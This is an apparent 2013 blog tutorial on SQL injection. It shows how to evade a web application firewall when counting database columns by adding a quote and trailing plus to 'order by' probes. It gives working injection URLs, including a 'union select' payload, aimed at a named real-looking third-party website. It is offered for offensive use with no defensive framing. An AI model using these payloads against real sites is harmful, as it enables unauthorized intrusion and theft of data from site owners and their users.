Wednesday, 3 April 2013

Common Problem
(Still No Error in order by 10000--)

First thing you do when a website is vulnerable to SQL injection is to check
the number of columns inside the database.
Already tried to put 10000 columns test but still got no errors?
Having problems knowing the number of columns inside the database?
The reason is it is blocked by the WAF, but here is a method to bypass it.

Example Vuln:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10'

Example:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10+order+by+10000--

If there is no error with that number of columns, it will be impossible for a small site like this. :)
To bypass this, you have to add ' after parameter id and also put + at the end.

So you will have something like this.. :)
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10%27+order+by+10000--+

NOTE
YOU STILL HAVE TO CONTINUE USING THE ' AND + AS YOU CONTINUE LIKE THIS.
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10' union select 1,2,3,4,5,6,7,8,9,10,11,12--+

HOPE YOU ENJOY THE TUTORIAL!

No comments:

Post a Comment